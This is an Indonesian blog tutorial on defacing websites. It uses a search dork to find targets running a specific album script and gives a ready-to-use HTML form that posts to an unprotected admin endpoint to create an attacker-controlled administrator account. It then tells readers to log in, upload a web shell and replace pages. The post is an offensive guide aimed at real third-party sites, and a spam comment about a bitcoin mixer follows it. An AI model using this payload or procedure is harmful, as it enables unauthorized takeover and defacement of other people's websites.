Menu

Deface CSRF - ADD ADMIN

Deface CSRF - ADD ADMIN

Hasil gambar untuk CSRF
CSRF - ADD ADMIN

baik kali ini saya akan memberikan tutorial deface menggunakan metode CSRF - ADD ADMIN
bagi kalian yang belum tau apa si CSRF Itu Klik aja disini Touch Me

dari judulnya saja kita sudah mengetahui bahwa add admin itu menambahkan admin, loh bagaimana bisa kak kan kita belum masuk ke dashboardnya?

jadi metode ini menjelaskan bahwa kita hanya membutuhkan url dan token dari sebuah website itu dengan script yang saya kasi di bawah.....
langsung saja bagaimana cara melakukannya?....

Pertama

cara pertama kalian hanya perlu mempersiapkan Script + Dork + Shell / JSO

Exploit CSRF : Touch Me

Dork : inurl:/dream/album.php
(kembangin lagi yoo)

Kedua ( Exploitasi / eksekusi ) 

Cara kedua --> setalah kalian dorking dengan dork di atas   
Pilihlah web mana saja yang menurut anda vuln....
Oke disini saya meneukan web yang vuln... loh ko bisa tau kak kalau itu vuln?
karna pas di tambahkan patch admin maka akan langsung menjukan halaman admin login... 
 
bagaimana cara mengeksekusinya...
coba kalian lihat di CSRF pada bagian

<form method="post"  action="https://{target kalian}/{path}/admin/usuario.php?action=incluir">
     <input type="hidden" name="user_login" value="aryakedek">
     <input type="hidden" name="user_password" type="hidden" value="123456" >
     <input type="hidden" name="user_email" value="email@gmail.com">
     <input type="submit" value="Tusbol">

nah di bagian ACTION isi dengan web kalian --> ingat bagian /admin/usuario.php?action=incluir gausah di apa apain yang kalian ganti hanya  https://{target kalian}/{path}
paham??

pada bagian name="user_login" value="ini usernme anda buat nanti login admin" --> sama dengan  name="user_password" type="hidden" value="ini password untuk login nanti"

email juga sama kaya di atas isinya...

oke kalau sudah masukan target ke CSRF -->
 
 disini terlihat 

username : gembel12
password : 123456

dan kita save CSRF nya.. dan buka di browser kalian masing masing

langsung aja klik Tusbol....

dan otomatis akan ke Redirect ke halaman login admin

 






nah disini kita sudah menyimpulkan bahwa username dan password kita sudah di tambah di server dia...
mari kita buka


yap bisa dilihat masuk ke dashboard menggunakan username dan password itu :)

kalian ke album dan JSO + Upload shell deh :)

sekian tutorial dari saya..
semoga bermanfaat assalamualaikum wr wb sampai jumpaa....


Komentar

  1. This disseminated programming produced the new cash, making few bitcoins. Essentially, bitcoins are simply long advanced locations and parities, put away in an online record called the "blockchain." bitcoin mixer

    BalasHapus

Posting Komentar

Iklan Tengah Post

Ads middle content1

Ads middle content2